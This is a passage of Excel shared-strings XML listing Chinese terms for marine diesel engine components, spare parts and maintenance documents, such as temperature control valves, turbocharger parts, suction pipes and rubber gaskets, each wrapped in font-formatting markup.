        <charset val="134"/>
      </rPr>
      <t>温度计</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计，液体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>倾角</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计，液体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度计管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度开关</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>高温动作</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度控制</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度控制阀，低温系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度控制阀，高温系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度控制阀，海水系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度控制阀，润滑油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度控制阀调节装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度控制器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度调节单元</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度调节阀高温水进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度调节阀壳体工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度指示器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文本</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文本：空冷器清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文本：空冷器修理</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>文本：增压器修理及封堵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>稳压器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮机叶片毛坯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮进口部件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮旁通阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器的焊接</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器的外形</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器壳体，备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器轴承，备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器转子，备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蜗杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蜗杆轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蜗轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>蜗轮侧的干洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>污油箱，明细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无泵液压千斤顶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无导向研磨轮</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无缝钢管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>?200x10</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无负荷并停止的主机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无人机仓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无损探伤方法</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>五位三通操纵阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>雾化器托架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>西班牙语说明板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>西格环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸气滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸气箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸入阀萃取工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸入阀阀杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸入阀壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸入管，</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸入管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>变速箱</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸入管布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸入管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸入管帽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸入管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸入管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>外部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锡铝连杆轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锡铝轴瓦涂层修复验收标准</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系泊和航海试验</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统油管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统油进口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系统油进口滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>系桩拉力试验</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>细滤器，润滑油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部操纵侧走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部操纵侧走台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部刮环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部冷却罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部排气侧走台布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部排气侧走台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部罩壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部轴承座</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部走台俯视图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部走台外形图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下部走台支架及管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下层走台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下层走台支架，管系</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下落阻滞装置袋</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下落阻滞装置核对表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>下轴瓦和曲轴检查</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示模块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>限流器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>相关读数，温度情况</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>相位断路继电器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>箱底</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>箱配件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶棒</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶衬</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶盖</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶园垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>消声器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>消声装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
